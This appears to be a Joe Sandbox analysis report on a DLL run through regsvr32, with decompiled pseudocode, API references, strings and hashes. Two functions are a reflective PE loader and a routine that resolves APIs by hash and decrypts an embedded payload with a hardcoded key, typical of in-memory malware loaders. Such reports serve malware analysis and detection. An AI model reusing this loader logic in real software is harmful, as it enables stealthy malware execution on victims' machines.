R[+, xrefs: 04B9863A
[, xrefs: 04B9871C
Y, xrefs: 04B98715

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: [$R[+$Y$v@
API String ID: 963392458-1276245682
Opcode ID: efe08f301ab2b251a86e33dfee0dd2d26676926c88cc055a74a7a241cd428695
Instruction ID: 0490693bb0627a970deb2737411348be8e7c7133991e11feb423bd5531c5d5b0
Opcode Fuzzy Hash: efe08f301ab2b251a86e33dfee0dd2d26676926c88cc055a74a7a241cd428695
Instruction Fuzzy Hash: 70614372C00209EFCF08DFE5D94A9EEBBB5FB48304F208199E911B6250D7B56A55CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 10002900, Relevance: 22.8, APIs: 15, Instructions: 331
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 89%

			E10002900(intOrPtr __ecx, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* _v8;
				void* _v12;
				signed short* _v16;
				void* _v20;
				void* _v24;
				long _v28;
				signed int _v32;
				intOrPtr _v64;
				char _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr* _v80;
				intOrPtr _v84;
				void* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				void* _t180;
				void* _t191;
				void* _t198;
				void* _t202;
				intOrPtr _t209;
				void* _t220;
				intOrPtr _t269;
				intOrPtr _t278;
				intOrPtr _t326;

				_v100 = __ecx;
				_v72 = 0;
				_v20 = 0;
				if(E10001FE0(_v100, _a8, 0x40) != 0) {
					_v16 = _a4;
					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
						_t10 =  &(_v16[0x1e]); // 0x47e81005
						if(E10001FE0(_v100, _a8,  *_t10 + 0xf8) != 0) {
							_t15 =  &(_v16[0x1e]); // 0x47e81005
							_v80 = _a4 +  *_t15;
							if( *_v80 == 0x4550) {
								if(( *(_v80 + 4) & 0x0000ffff) == 0x14c) {
									if(( *(_v80 + 0x38) & 0x00000001) == 0) {
										_v84 = _v80 + ( *(_v80 + 0x14) & 0x0000ffff) + 0x18;
										_v32 =  *(_v80 + 0x38);
										_v12 = 0;
										while(_v12 < ( *(_v80 + 6) & 0x0000ffff)) {
											if( *((intOrPtr*)(_v84 + 0x10)) != 0) {
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) +  *((intOrPtr*)(_v84 + 0x10));
											} else {
												_v88 =  *((intOrPtr*)(_v84 + 0xc)) + _v32;
											}
											if(_v88 > _v20) {
												_v20 = _v88;
											}
											_v12 = _v12 + 1;
											_v84 = _v84 + 0x28;
										}
										__imp__GetNativeSystemInfo( &_v68); // executed
										_v28 =  *((intOrPtr*)(_v80 + 0x50)) + _v64 - 0x00000001 &  !(_v64 - 1);
										_t65 = _v64 - 1; // -1
										if(_v28 == (_v20 + _t65 &  !(_v64 - 1))) {
											_t180 = VirtualAlloc( *(_v80 + 0x34), _v28, 0x3000, 4); // executed
											_v24 = _t180;
											if(_v24 != 0) {
												L26:
												_v72 = HeapAlloc(GetProcessHeap(), 8, 0x34);
												if(_v72 != 0) {
													 *((intOrPtr*)(_v72 + 4)) = _v24;
													asm("sbb edx, edx");
													 *(_v72 + 0x14) =  ~( ~( *(_v80 + 0x16) & 0x2000));
													 *((intOrPtr*)(_v72 + 0x1c)) = _a12;
													 *((intOrPtr*)(_v72 + 0x20)) = _a16;
													 *((intOrPtr*)(_v72 + 0x24)) = _a20;
													 *((intOrPtr*)(_v72 + 0x28)) = _a24;
													 *((intOrPtr*)(_v72 + 0x30)) = _v64;
													if(E10001FE0(_v100, _a8,  *(_v80 + 0x54)) != 0) {
														_t191 = VirtualAlloc(_v24,  *(_v80 + 0x54), 0x1000, 4); // executed
														_v8 = _t191;
														E10001E60(_v8, _v16,  *(_v80 + 0x54));
														_t115 =  &(_v16[0x1e]); // 0x47e81005
														 *_v72 = _v8 +  *_t115;
														 *((intOrPtr*)( *_v72 + 0x34)) = _v24;
														_t198 = E10002010(_v100, _a4, _a8, _v80, _v72); // executed
														if(_t198 != 0) {
															_t269 =  *((intOrPtr*)( *_v72 + 0x34)) -  *(_v80 + 0x34);
															_v76 = _t269;
															if(_t269 == 0) {
																 *((intOrPtr*)(_v72 + 0x18)) = 1;
															} else {
																 *((intOrPtr*)(_v72 + 0x18)) = E10002500(_v100, _v72, _v76);
															}
															if(E10002670(_v100, _v72) != 0) {
																_t202 = E10002300(_v100, _v72); // executed
																if(_t202 != 0) {
																	if(E10002480(_v100, _v72) != 0) {
																		if( *((intOrPtr*)( *_v72 + 0x28)) == 0) {
																			 *(_v72 + 0x2c) = 0;
																			L49:
																			return _v72;
																		}
																		if( *(_v72 + 0x14) == 0) {
																			 *(_v72 + 0x2c) = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
																			L47:
																			goto L49;
																		}
																		_v96 = _v24 +  *((intOrPtr*)( *_v72 + 0x28));
																		_t209 =  *0x10058ed8; // 0x0
																		_t278 =  *0x10058ed4; // 0x1
																		_t326 =  *0x10058ed0; // 0x10000000
																		_v92 = _v96(_t326, _t278, _t209);
																		if(_v92 != 0) {
																			 *((intOrPtr*)(_v72 + 0x10)) = 1;
																			goto L47;
																		}
																		SetLastError(0x45a);
																		L50:
																		E10002EC0(_v100, _v72);
																		return 0;
																	}
																	goto L50;
																}
																goto L50;
															}
															goto L50;
														}
														goto L50;
													}
													goto L50;
												}
												VirtualFree(_v24, 0, 0x8000);
												SetLastError(0xe);
												return 0;
											}
											_t220 = VirtualAlloc(0, _v28, 0x3000, 4); // executed
											_v24 = _t220;
											if(_v24 != 0) {
												goto L26;
											}
											SetLastError(0xe);
											return 0;
										}
										SetLastError(0xc1);
										return 0;
									}
									SetLastError(0xc1);
									return 0;
								}
								SetLastError(0xc1);
								return 0;
							}
							SetLastError(0xc1);
							return 0;
						}
						return 0;
					}
					SetLastError(0xc1);
					return 0;
				}
				return 0;
			}

0x10002906
0x10002909
0x10002910
0x10002927
0x10002933
0x10002941
0x10002958
0x10002970
0x1000297f
0x10002982
0x1000298e
0x100029af
0x100029cc
0x100029ee
0x100029f7
0x100029fa
0x10002a15
0x10002a28
0x10002a44
0x10002a2a
0x10002a33
0x10002a33
0x10002a4d
0x10002a52
0x10002a52
0x10002a09
0x10002a12
0x10002a12
0x10002a5b
0x10002a78
0x10002a81
0x10002a92
0x10002ab8
0x10002abe
0x10002ac5
0x10002af2
0x10002b03
0x10002b0a
0x10002b32
0x10002b44
0x10002b4b
0x10002b54
0x10002b5d
0x10002b66
0x10002b6f
0x10002b78
0x10002b90
0x10002bae
0x10002bb4
0x10002bc6
0x10002bd4
0x10002bda
0x10002be4
0x10002bfa
0x10002c01
0x10002c18
0x10002c1b
0x10002c1e
0x10002c3b
0x10002c20
0x10002c33
0x10002c33
0x10002c50
0x10002c63
0x10002c6a
0x10002c84
0x10002c96
0x10002d00
0x10002d07
0x00000000
0x10002d07
0x10002c9f
0x10002cf8
0x10002cfb
0x00000000
0x10002cfb
0x10002cac
0x10002caf
0x10002cb5
0x10002cbc
0x10002cc6
0x10002ccd
0x10002ce1
0x00000000
0x10002ce1
0x10002cd4
0x10002d0c
0x10002d13
0x00000000
0x10002d18
0x00000000
0x10002c86
0x00000000
0x10002c6c
0x00000000
0x10002c52
0x00000000
0x10002c03
0x00000000
0x10002b92
0x10002b17
0x10002b1f
0x00000000
0x10002b25
0x10002ad4
0x10002ada
0x10002ae1
0x00000000
0x00000000
0x10002ae5
0x00000000
0x10002aeb
0x10002a99
0x00000000
0x10002a9f
0x100029d3
0x00000000
0x100029d9
0x100029b6
0x00000000
0x100029bc
0x10002995
0x00000000
0x1000299b
0x00000000
0x10002972
0x10002948
0x00000000
0x1000294e
0x00000000

APIs

Part of subcall function 10001FE0: SetLastError.KERNEL32(0000000D,?,?,10002925,10008AC6,00000040), ref: 10001FF1

SetLastError.KERNEL32(000000C1,10008AC6,00000040), ref: 10002948

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 08cff93c7344199116f568f774659ccae89e30fc42bc807c3f2613e3b5310ed8
Instruction ID: 2ef2df373ea658209f5af2a718a6df98ca9e1c1927523c70ceffa034f4820264
Opcode Fuzzy Hash: 08cff93c7344199116f568f774659ccae89e30fc42bc807c3f2613e3b5310ed8
Instruction Fuzzy Hash: 01E1F874A01219EFEB04CF94C994E9EB7B2FF88384F208559E905AB399D770AD46CF50

Uniqueness

Uniqueness Score: -1.00%

Function 100088E0, Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 131
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E100088E0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HWND__* _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct HWND__* _v28;
				struct HWND__* _v32;
				long _v36;
				int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				void* __ebp;
				void* _t38;
				long _t45;
				long _t47;
				intOrPtr _t56;
				void* _t63;
				intOrPtr _t68;

				_t79 = __esi;
				_t78 = __edi;
				_t64 = __ebx;
				_v56 = _a8;
				 *0x10058ed0 = _a4;
				_t72 = _a8;
				 *0x10058ed4 = _a8;
				 *0x10058ed8 = _a12;
				_v8 = 0;
				_v36 = 0;
				_v28 = 0;
				_v32 = 0;
				_v12 = 0;
				_t38 = E10008860(__eflags); // executed
				if(_t38 != 0) {
					_push(0x10029b4c);
					E1001771B(__ebx, _t72, __edi, __esi, __eflags);
					return 0;
				}
				 *0x10056f08 = 0;
				 *0x10056f0c = 0;
				 *0x10056f10 = 0;
				 *0x10056f18 = 0;
				 *0x10056f14 = 0;
				_v40 = 0x44368d;
				_v52 = 0x3f8fc5;
				_v20 = 0x3b272b;
				_v24 = 0x2feb60;
				_v44 = 0xdd3c;
				_v48 = 0x47c;
				_v36 = 0x24e00;
				_v28 = E10006170(L"kernel32.dll");
				_v32 = E10006170(L"ntdll.dll");
				 *0x10058eb0 = E10006D50(_v28, 0x70e66e6b);
				 *0x10058eb8 = E10006D50(_v28, 0x579606ae);
				_t95 =  *0x10058eb8;
				if( *0x10058eb8 == 0) {
					_t45 = E10017716(0x10029b18);
					_t47 = E10017716("8192") | 0x00001000;
					__eflags = _t47;
					_v12 = VirtualAlloc(0, _v36, _t47, _t45);
				} else {
					_t63 =  *0x10058eb8(0xffffffff, 0, _v36, E10017716("8192") | 0x00001000, E10017716(0x10029b18), 0); // executed
					_v12 = _t63;
				}
				E10016A10(_t64, _t78, _t79, _v12, 0x10032098, _v36);
				_t68 =  *0x10056f04; // 0x730f
				_v16 = E1001703B(_t64, _v36, _t78, _t79, _t68);
				E10002FA0(_t95, _v16, "vzyxQQjtnPpM1kMtP2^c)toAOgGzJnA(x4n)mZV?Zgqbqls>&28Kb303hUncVaad@?N*A%W2eBhDNd+m_Bl2cFznqh*vrDpHPGj%?_!pbLp", 0x6c);
				E10004F00(_v16, _v12, _v36);
				_t56 = E10002D20(0x10058ebc, _v12, _v36); // executed
				 *0x10058edc = _t56;
				ShowWindow(0, _v40);
				return 1;
			}

0x100088e0
0x100088e0
0x100088e0
0x100088e9
0x100088ef
0x100088f5
0x100088f8
0x10008901
0x10008906
0x1000890d
0x10008914
0x1000891b
0x10008922
0x10008929
0x10008930
0x10008966
0x1000896b
0x00000000
0x10008973
0x10008932
0x1000893c
0x10008946
0x10008950
0x1000895a
0x1000897a
0x10008981
0x10008988
0x1000898f
0x10008996
0x1000899d
0x100089a4
0x100089b8
0x100089c8
0x100089dc
0x100089f2
0x100089f7
0x100089fe
0x10008a3b
0x10008a51
0x10008a51
0x10008a63
0x10008a00
0x10008a2b
0x10008a31
0x10008a31
0x10008a73
0x10008a7b
0x10008a8a
0x10008a98
0x10008aac
0x10008ac1
0x10008ac6
0x10008ad1
0x00000000

APIs

Part of subcall function 10008860: _malloc.LIBCMT ref: 1000886B

_printf.LIBCMT ref: 1000896B
VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00024E00,00000000,00000000,00000000), ref: 10008A2B
VirtualAlloc.KERNEL32(00000000,00024E00,00000000,00000000), ref: 10008A5D
_malloc.LIBCMT ref: 10008A82
ShowWindow.USER32(00000000,0044368D,00000000,00024E00), ref: 10008AD1

Strings

+';, xrefs: 10008988
vzyxQQjtnPpM1kMtP2^c)toAOgGzJnA(x4n)mZV?Zgqbqls>&28Kb303hUncVaad@?N*A%W2eBhDNd+m_Bl2cFznqh*vrDpHPGj%?_!pbLp, xrefs: 10008A8F
`/, xrefs: 1000898F
8192, xrefs: 10008A10, 10008A44
kernel32.dll, xrefs: 100089AB
ntdll.dll, xrefs: 100089BB

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocVirtual_malloc$NumaShowWindow_printf
String ID: +';$8192$`/$kernel32.dll$ntdll.dll$vzyxQQjtnPpM1kMtP2^c)toAOgGzJnA(x4n)mZV?Zgqbqls>&28Kb303hUncVaad@?N*A%W2eBhDNd+m_Bl2cFznqh*vrDpHPGj%?_!pbLp
API String ID: 1487653210-3670691644
Opcode ID: 230bbdfcd20e835c4d7365e9bc9cc9309c602f396e76a36ffbf0d77b2387037d
Instruction ID: 74e036033439e47f0f6271ee42a165f027743cdfe4c2c4d01037afcb8f86e406
Opcode Fuzzy Hash: 230bbdfcd20e835c4d7365e9bc9cc9309c602f396e76a36ffbf0d77b2387037d
Instruction Fuzzy Hash: FE5141F5D00214AFEB00CF90EC96BAE77B4FB48344F144528E909BB345E775A6448BA2

Uniqueness

Uniqueness Score: -1.00%

Function 10013A9B, Relevance: 16.6, APIs: 11, Instructions: 103
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E10013A9B() {
				struct _CRITICAL_SECTION* _v4;
				char _v28;
				char _v36;
				char _v44;
				intOrPtr _v56;
				void* __ebx;
				intOrPtr __ecx;
				signed int __edi;
				void* __esi;
				void* __ebp;
				struct _CRITICAL_SECTION* _t39;
				intOrPtr _t40;
				void* _t41;
				long _t44;
				void* _t45;
				signed int* _t51;
				intOrPtr _t64;
				long _t68;
				void* _t69;
				void* _t70;
				signed int _t72;
				intOrPtr _t78;
				signed int _t82;
				void* _t86;
				signed int _t88;
				void* _t90;
				void* _t91;
				void* _t93;

				_push(_t72);
				_push(_t69);
				_push(_t88);
				_t86 = _t72;
				_t1 = _t86 + 0x1c; // 0x1005aaa8
				_t39 = _t1;
				_v4 = _t39;
				EnterCriticalSection(_t39);
				_t3 = _t86 + 4; // 0x20
				_t40 =  *_t3;
				_t4 = _t86 + 8; // 0x3
				_t82 =  *_t4;
				if(_t82 >= _t40) {
					L7:
					_t82 = 1;
					__eflags = _t40 - 1;
					if(_t40 <= 1) {
						L12:
						_t21 = _t40 + 0x20; // 0x40
						_t88 = _t21;
						_t22 = _t86 + 0x10; // 0x3285640
						_t41 =  *_t22;
						__eflags = _t41;
						if(__eflags != 0) {
							_t69 = GlobalHandle(_t41);
							GlobalUnlock(_t69);
							_t44 = E100134F9(_t72, __eflags, _t88, 8);
							_t72 = 0x2002;
							_t45 = GlobalReAlloc(_t69, _t44, ??);
						} else {
							_t68 = E100134F9(_t72, __eflags, _t88, 8);
							_pop(_t72);
							_t45 = GlobalAlloc(2, _t68); // executed
						}
						__eflags = _t45;
						if(_t45 != 0) {
							_t70 = GlobalLock(_t45);
							_t25 = _t86 + 4; // 0x20
							__eflags = _t88 -  *_t25 << 3;
							E100174D0(_t82, _t70 +  *_t25 * 8, 0, _t88 -  *_t25 << 3);
							 *(_t86 + 4) = _t88;
							 *(_t86 + 0x10) = _t70;
							goto L20;
						} else {
							_t23 = _t86 + 0x10; // 0x3285640
							_t86 =  *_t23;
							__eflags = _t86;
							if(_t86 != 0) {
								GlobalLock(GlobalHandle(_t86));
							}
							LeaveCriticalSection(_v4);
							_push(_t88);
							_t90 = _t93;
							_push(_t72);
							_v28 = 0x10057168;
							E10017C83( &_v28, 0x1002e258);
							asm("int3");
							_push(_t90);
							_t91 = _t93;
							_push(_t72);
							_v36 = 0x10057200;
							E10017C83( &_v36, 0x1002e2b8);
							asm("int3");
							_push(_t91);
							_push(_t72);
							_v44 = 0x10057298;
							E10017C83( &_v44, 0x1002e2fc);
							asm("int3");
							_push(4);
							E10017BC1(E10027DEC, _t69, _t82, _t86);
							_t78 = E10013965(0x104);
							_v56 = _t78;
							_t64 = 0;
							_v44 = 0;
							if(_t78 != 0) {
								_t64 = E1000CF71(_t78);
							}
							return E10017C60(_t64);
						}
					} else {
						_t18 = _t86 + 0x10; // 0x3285640
						_t72 =  *_t18 + 8;
						__eflags = _t72;
						while(1) {
							__eflags =  *_t72 & 0x00000001;
							if(( *_t72 & 0x00000001) == 0) {
								break;
							}
							_t82 = _t82 + 1;
							_t72 = _t72 + 8;
							__eflags = _t82 - _t40;
							if(_t82 < _t40) {
								continue;
							}
							break;
						}
						__eflags = _t82 - _t40;
						if(_t82 < _t40) {
							goto L20;
						} else {
							goto L12;
						}
					}
				} else {
					_t13 = __esi + 0x10; // 0x3285640
					__ecx =  *_t13;
					__eflags =  *(__ecx + __edi * 8) & 0x00000001;
					if(( *(__ecx + __edi * 8) & 0x00000001) == 0) {
						L20:
						_t30 = _t86 + 0xc; // 0x3
						__eflags = _t82 -  *_t30;
						if(_t82 >=  *_t30) {
							_t31 = _t82 + 1; // 0x4
							 *((intOrPtr*)(_t86 + 0xc)) = _t31;
						}
						_t33 = _t86 + 0x10; // 0x3285640
						_t51 =  *_t33 + _t82 * 8;
						 *_t51 =  *_t51 | 0x00000001;
						__eflags =  *_t51;
						_t37 = _t82 + 1; // 0x4
						 *(_t86 + 8) = _t37;
						LeaveCriticalSection(_v4);
						return _t82;
					} else {
						goto L7;
					}
				}
			}

0x10013a9b
0x10013a9c
0x10013a9d
0x10013a9f
0x10013aa1
0x10013aa1
0x10013aa6
0x10013aaa
0x10013ab0
0x10013ab0
0x10013ab3
0x10013ab3
0x10013ab8
0x10013ac7
0x10013ac9
0x10013aca
0x10013acc
0x10013ae9
0x10013ae9
0x10013ae9
0x10013aec
0x10013aec
0x10013aef
0x10013af1
0x10013b0f
0x10013b12
0x10013b20
0x10013b26
0x10013b29
0x10013af3
0x10013af6
0x10013afc
0x10013b00
0x10013b00
0x10013b2f
0x10013b31
0x10013b5e
0x10013b60
0x10013b67
0x10013b71
0x10013b79
0x10013b7c
0x00000000
0x10013b33
0x10013b33
0x10013b33
0x10013b36
0x10013b38
0x10013b42
0x10013b42
0x10013b4c
0x1000a0a7
0x1000a0a8
0x1000a0aa
0x1000a0b4
0x1000a0bb
0x1000a0c0
0x1000a0c1
0x1000a0c2
0x1000a0c4
0x1000a0ce
0x1000a0d5
0x1000a0da
0x1000a0db
0x1000a0de
0x1000a0e8
0x1000a0ef
0x1000a0f4
0x1000a0f5
0x1000a0fc
0x1000a10b
0x1000a10d
0x1000a110
0x1000a114
0x1000a117
0x1000a119
0x1000a119
0x1000a123
0x1000a123
0x10013ace
0x10013ace
0x10013ad1
0x10013ad1
0x10013ad4
0x10013ad4
0x10013ad7
0x00000000
0x00000000
0x10013ad9
0x10013ada
0x10013add
0x10013adf
0x00000000
0x00000000
0x00000000
0x10013adf
0x10013ae1
0x10013ae3
0x00000000
0x00000000
0x00000000
0x00000000
0x10013ae3
0x10013aba
0x10013aba
0x10013aba
0x10013abd
0x10013ac1
0x10013b7f
0x10013b7f
0x10013b7f
0x10013b82
0x10013b84
0x10013b87
0x10013b87
0x10013b8a
0x10013b91
0x10013b94
0x10013b94
0x10013b97
0x10013b9a
0x10013b9d
0x10013baa
0x00000000
0x00000000
0x00000000
0x10013ac1

APIs

EnterCriticalSection.KERNEL32(1005AAA8,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004), ref: 10013AAA
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10013B00
GlobalHandle.KERNEL32(03285640), ref: 10013B09
GlobalUnlock.KERNEL32(00000000,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004), ref: 10013B12
GlobalReAlloc.KERNEL32 ref: 10013B29
GlobalHandle.KERNEL32(03285640), ref: 10013B3B
GlobalLock.KERNEL32 ref: 10013B42
LeaveCriticalSection.KERNEL32(?,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004), ref: 10013B4C
GlobalLock.KERNEL32 ref: 10013B58
_memset.LIBCMT ref: 10013B71
LeaveCriticalSection.KERNEL32(?), ref: 10013B9D

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: db40230195121c03edd1d9de773089a9b398076d37fb16ef380e98a53d4696a6
Instruction ID: d2dedea389880cd6532a8cc41d1f31ca5a81082a511f3f96b23d25218acb7329
Opcode Fuzzy Hash: db40230195121c03edd1d9de773089a9b398076d37fb16ef380e98a53d4696a6
Instruction Fuzzy Hash: 5F31C1312043129FE720CF34CC8DA2A77E9FF84280B12891DE996C7651EB30F885CB10

Uniqueness

Uniqueness Score: -1.00%

Function 10016380, Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 27%

			E10016380(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x1002f780);
				_t8 = E1001984C(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E10019891(_t8);
				}
				if( *0x1005c984 != 3) {
					_push(_t23);
					L7:
					_push(0);
					_t8 = RtlFreeHeap( *0x1005ad4c); // executed
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E10017D62(_t31);
						 *_t10 = E10017D27(GetLastError());
					}
					goto L9;
				}
				E1001A549(4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E1001A5C2(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E1001A5ED();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E100163D6();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}

0x10016380
0x10016382
0x10016387
0x1001638c
0x10016391
0x10016408
0x1001640d
0x1001640d
0x1001639a
0x100163df
0x100163e0
0x100163e0
0x100163e8
0x100163ee
0x100163f0
0x100163f2
0x10016405
0x10016407
0x00000000
0x100163f0
0x1001639e
0x100163a4
0x100163a9
0x100163af
0x100163b4
0x100163b6
0x100163b7
0x100163b8
0x100163be
0x100163bf
0x100163c6
0x100163cf
0x00000000
0x100163d1
0x100163d1
0x00000000
0x100163d1

APIs

__lock.LIBCMT ref: 1001639E

Part of subcall function 1001A549: __mtinitlocknum.LIBCMT ref: 1001A55D
Part of subcall function 1001A549: __amsg_exit.LIBCMT ref: 1001A569
Part of subcall function 1001A549: EnterCriticalSection.KERNEL32(00000001,00000001,?,1001C014,0000000D,1002FA58,00000008,1001C106,00000001,?,?,00000001,?,?,10017AE8,00000001), ref: 1001A571

___sbh_find_block.LIBCMT ref: 100163A9
___sbh_free_block.LIBCMT ref: 100163B8
RtlFreeHeap.NTDLL(00000000,?,1002F780,0000000C,1001BF6A,00000000,?,1001E73B,?,00000001,00000001,1001A4D3,00000018,1002F8C0,0000000C,1001A562), ref: 100163E8
GetLastError.KERNEL32(?,1001E73B,?,00000001,00000001,1001A4D3,00000018,1002F8C0,0000000C,1001A562,00000001,00000001,?,1001C014,0000000D,1002FA58), ref: 100163F9

Memory Dump Source

Source File: 00000002.00000002.396523050.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.396515515.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396553578.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.396575018.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.396612367.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396624120.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.396629852.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 933a214dfe2b721a1172918ae6127c9818b4b1158d9b2876c596c2397cc5b652
Instruction ID: 632ebcc47bfd7d50c2ae726889ea94072d2ceb4c664f4e9832d4c107bd8c1e1e
Opcode Fuzzy Hash: 933a214dfe2b721a1172918ae6127c9818b4b1158d9b2876c596c2397cc5b652
Instruction Fuzzy Hash: EE01D635805326EBEF20DBB4AC0AB9D3BF4EF053A0F214109F554AE091CB34EAC19A64

Uniqueness

Uniqueness Score: -1.00%

Function 04BA2C24, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,2E751909,00000000,00000000,00534833,00000000,00000000,00000000,?,?), ref: 04BA2D02

Strings

3HS, xrefs: 04BA2C57

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: 3HS
API String ID: 963392458-330188696
Opcode ID: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
Instruction ID: 87568175de1aa9a8497384f7a0ef7f64bf4b093529d96116a777dc63c46cbc43
Opcode Fuzzy Hash: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
Instruction Fuzzy Hash: 3421F372800248BBCF159F96DC0ACDFBFB9EF85704F108198F915A2220C3B59A24DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 100021D0, Relevance: 3.1, APIs: 2, Instructions: 98
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E100021D0(intOrPtr __ecx, intOrPtr* _a4, void** _a8) {
				long _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				int _t67;

				_v28 = __ecx;
